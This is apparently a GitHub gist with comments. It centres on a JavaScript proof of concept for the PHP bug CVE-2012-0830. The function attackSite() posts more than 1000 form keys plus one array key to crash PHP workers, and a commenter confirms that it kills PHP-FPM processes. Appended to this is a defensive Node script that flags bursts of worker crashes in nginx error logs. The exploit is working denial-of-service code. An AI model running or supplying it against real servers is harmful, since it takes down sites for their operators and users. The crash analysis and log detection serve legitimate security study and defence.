@pilate /phpkill.js
// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
// Generate 1000 normal keys and one array
function createEvilObj () {
  var evil_obj = {};
  // Scalar keys numbered past PHP's default max_input_vars limit of 1000
  for (var i = 0; i < 1001; i++) {
    evil_obj[i] = 1;
  }
  // One array-style key, registered after the limit has already been exceeded
  evil_obj['kill[]'] = 'kill';
  return evil_obj;
}
// Serialize Javascript object into POST data
function serializeObj (obj) {
  var str = [];
  for (var p in obj) {
    str.push(p + "=" + obj[p]);
  }
  return str.join("&");
}
// Run attack
function attackSite () {
  var bad = serializeObj(createEvilObj());
  var xhr = new XMLHttpRequest();
  xhr.open("POST", location.href, true);
  // Browsers refuse to let script set Content-Length; they compute it from the body anyway
  xhr.setRequestHeader('Content-Length', bad.length);
  // PHP only parses the body into request variables for form-encoded content
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send(bad);
}

There are actually 1001 normal keys + one array there.


My server uses nginx and proxies through PHP-FPM. For one thing, Chrome refuses line 29 (at least in the console). But this does work. A call to attackSite() results in one of the PHP instances dying:

2012/02/03 10:06:42 [error] 22018#0: *692 recv() failed (104: Connection reset by peer) while reading response header from upstream

Then it is brought back up. So I guess if I had a lot of people doing this attack even with PHP-FPM there'd be some real trouble.
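As an added example (not part of the gist and not the commenter's setup), the symptom described in this comment can be picked out of the nginx error log: the upstream-reset line nginx writes when a PHP-FPM worker dies mid-request. The script below parses such lines, groups them by minute and reports bursts together with the client addresses nginx appended. It assumes nginx's default error_log line layout; the sample log lines are constructed for this example, only the message text is taken from the line quoted above.

```javascript
// Added example: spot clusters of PHP-FPM worker deaths in an nginx error log.
// Assumes the default nginx error_log layout:
//   YYYY/MM/DD HH:MM:SS [level] pid#tid: *cid message, client: ..., server: ..., request: "...", ...
// The "recv() failed (104: Connection reset by peer) while reading response header from upstream"
// message is what nginx logs when the FastCGI backend (PHP-FPM) closes the connection without a
// response, i.e. when the worker handling the request crashed.
const UPSTREAM_RESET =
  /^(\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}):\d{2} \[error\] \d+#\d+: \*\d+ recv\(\) failed \(104: Connection reset by peer\) while reading response header from upstream(?:, client: ([^,\s]+))?/;

// Returns one record per matching line: { minute, client }. client is null when
// nginx did not append the request context to the line.
function parseUpstreamResets(logText) {
  const hits = [];
  for (const line of logText.split('\n')) {
    const m = UPSTREAM_RESET.exec(line);
    if (m) hits.push({ minute: m[1], client: m[2] || null });
  }
  return hits;
}

// Groups resets by minute and returns the minutes with at least `threshold` hits,
// most-hit minute first, each with the distinct client addresses seen in it.
function findCrashBursts(logText, threshold) {
  const byMinute = new Map();
  for (const hit of parseUpstreamResets(logText)) {
    const entry = byMinute.get(hit.minute) || { minute: hit.minute, count: 0, clients: new Set() };
    entry.count += 1;
    if (hit.client) entry.clients.add(hit.client);
    byMinute.set(hit.minute, entry);
  }
  return [...byMinute.values()]
    .filter((e) => e.count >= threshold)
    .sort((a, b) => b.count - a.count)
    .map((e) => ({ minute: e.minute, count: e.count, clients: [...e.clients].sort() }));
}

// Constructed sample log: three worker deaths inside one minute from a single client
// (what repeated attackSite() calls would leave behind), an unrelated error line,
// and one later reset without request context.
const SAMPLE_LOG = [
  '2012/02/03 10:06:42 [error] 22018#0: *692 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 203.0.113.7, server: example.test, request: "POST /index.php HTTP/1.1", upstream: "fastcgi://unix:/var/run/php-fpm.sock:", host: "example.test"',
  '2012/02/03 10:06:43 [error] 22018#0: *693 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 203.0.113.7, server: example.test, request: "POST /index.php HTTP/1.1", upstream: "fastcgi://unix:/var/run/php-fpm.sock:", host: "example.test"',
  '2012/02/03 10:06:51 [error] 22018#0: *695 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 203.0.113.7, server: example.test, request: "POST /index.php HTTP/1.1", upstream: "fastcgi://unix:/var/run/php-fpm.sock:", host: "example.test"',
  '2012/02/03 10:07:03 [error] 22018#0: *696 open() "/var/www/favicon.ico" failed (2: No such file or directory), client: 198.51.100.2, server: example.test, request: "GET /favicon.ico HTTP/1.1", host: "example.test"',
  '2012/02/03 10:12:19 [error] 22018#0: *710 recv() failed (104: Connection reset by peer) while reading response header from upstream',
].join('\n');

// Stand-alone run: node this_file.js
if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(findCrashBursts(SAMPLE_LOG, 3), null, 2));
}
```

A single reset now and then is just a crashed worker that PHP-FPM respawns; a burst from one client against a PHP-handled URL is the pattern worth acting on, for instance with a rate limit or block on that address in nginx. Lines without the client suffix still count towards the burst, so a trimmed log like the one quoted above is not silently ignored.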


It was just an observation really. Can you provide some technical details about what exactly happens inside PHP?
I know some PHP internals, but not enough for this actually. Thanks!
